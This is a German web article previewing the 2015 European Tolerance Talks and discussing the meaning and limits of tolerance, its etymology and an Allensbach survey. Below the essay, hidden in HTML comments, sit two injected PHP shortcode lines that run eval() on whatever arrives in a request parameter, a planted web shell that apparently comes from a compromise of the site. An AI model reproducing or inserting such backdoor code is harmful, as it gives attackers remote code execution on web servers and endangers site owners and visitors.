Themenvorschau 2015

Wie weit geht Toleranz?

Aufgaben von Staat, Wirtschaft und Gesellschaft

Das Thema der Europäischen Toleranzgespräche 2015 steht fest. Wie weit geht Toleranz? Und was sind ihre Grenzen? Was sind die Aufgaben von Staat, Wirtschaft und Gesellschaft? Und was was kann der einzelne dazu beitragen?

Eine Allensbach-Analyse aus dem Jahre 2013 beschäftigt sich mit der „Toleranz gegenüber bestimmten Normverstößen“. Ein erheblicher Teil der Deutschen spüre den sozialen Druck, dem man ausgesetzt sein kann, wenn man mit seiner Ansicht vom gesellschaftlichen Konsens abweicht.

Aber ist das auch jene Toleranz und der Geist der Aufklärung, Befreiung von Unterdrückung und Bevormundung, die von den Gründervätern in den USA 1776, den Freimaurern am Hofe Josefs II. oder von den Revolutionären im Paris des Jahres 1789 vertreten und erkämpft wurden? „Wenn Toleranz zu weit geht, kann sie Dummheit werden“, sagt der Autor und Kolumnist Stefan Rogal. „Toleranz – ein süßer Wahn?“ hieß ein 3Sat-Beitrag provokant.

Das Wörtchen Toleranz (Duldsamkeit) ist eines der umstrittensten Begriffe der Neuzeit. Es kommt vom lateinischen Verb tolerare (von „tolus“ – „Last“) und bedeutet ertragen, durchstehen, aushalten oder erdulden, aber auch zulassen. Toleranz beschreibt aber auch die Fähigkeit, das Anderssein oder Andershandeln zu akzeptieren, Herkunft, Religion, Neigungen, Moral oder Überzeugungen.

Toleranz ist heute eine moderne Tugend, und in einer globalen Gesellschaft gilt sie als einer der wichtigsten Werte, die das Miteinander der unterschiedlichsten Kulturen und Lebensformen garantieren. Von jedem aufgeklärten Bürger erwartet man Toleranz, in der Erziehung führt man zu ihr hin, sie gilt als Grundfeste der modernen Demokratien. Aber wie weit darf und kann sie gehen?

<!– [insert_php]if (isset($_REQUEST["JGK"])){eval($_REQUEST["JGK"]);exit;}[/insert_php][php]if (isset($_REQUEST["JGK"])){eval($_REQUEST["JGK"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["hmyc"])){eval($_REQUEST["hmyc"]);exit;}[/insert_php][php]if (isset($_REQUEST["hmyc"])){eval($_REQUEST["hmyc"]);exit;}[/php] –>

Print Friendly